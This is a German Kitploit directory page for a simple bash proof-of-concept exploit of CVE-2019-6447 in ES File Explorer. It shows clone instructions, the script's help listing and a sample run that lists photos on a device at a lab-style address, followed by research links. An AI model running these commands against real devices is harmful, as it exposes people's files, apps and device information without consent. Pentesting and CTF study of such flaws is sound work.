Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC-ES-File-Explorer-CVE-2019-6447 — Sehr einfaches Bash-Skript zur Ausnutzung von CVE-2019-6447. | Kitploit
Tools/GitHubGitHub/julio-cfa/poc-es-file-explorer-cve-2019-6447
Android-SicherheitSchwachstellenanalyseExploitationDatenexfiltrationInformationsbeschaffungMobile Sicherheit
GitHubjulio-cfa/poc-es-file-explorer-cve-2019-6447

POC-ES-File-Explorer-CVE-2019-6447

Sehr einfaches Bash-Skript zur Ausnutzung von CVE-2019-6447.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 4 JahrenNoch nicht geprüft

PoC ES File Explorer 4.1.9.7.4 (CVE-2019-6447)

Dies ist eine sehr einfache Implementierung in bash des CVE-2019-6447 PoC. Es verwendet im Grunde curl, um die Anfragen mit den richtigen Parametern zu senden. Ich habe es erstellt, da ich während eines CTF nach einem ähnlichen Skript suchte und keins finden konnte. Sie können mit dem Originalskript herumspielen und es nach Ihren Wünschen anpassen.

Installation:

Einfach das Repository klonen und die .sh-Datei verwenden.

root@kitploit:~
git clone [email protected]:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git

Oder kopieren Sie den rohen Inhalt und fügen Sie ihn in eine Datei ein.

Verwendung:

root@kitploit:~
kyoto :: ~ % ./ESExplorerExploit.sh -h                            

--- This is a very simple PoC of the ES File Explorer CVE-2019-6447 ---

You can try the following commands: 

listFiles	List all files
listPics	List all pictures
listVideos	List all videos
listAudios	List all audios
listApps	List all applications installed
listAppsSystem	List system apps
listAppsPhone	List communication related applications
listAppsSdcard	List the apps installed on the sd card
listAppsAll	List all applications
getAppThumbnail	List icons for the specified application
appLaunch	Start the developed application
appPull         Download an application from your device
getDeviceInfo	Get system information

Usage example: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles

Beispiel:

root@kitploit:~
kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles                                                                               
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", }, 
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", }, 
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", }, 
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]

Referenzen:

Falls Sie neugierig sind, wie dieser Exploit hinter den Kulissen funktioniert, ODER falls er fehlschlägt und Sie Ihr eigenes Skript erstellen müssen, können Sie folgende Links lesen:

https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566

Tool herunterladen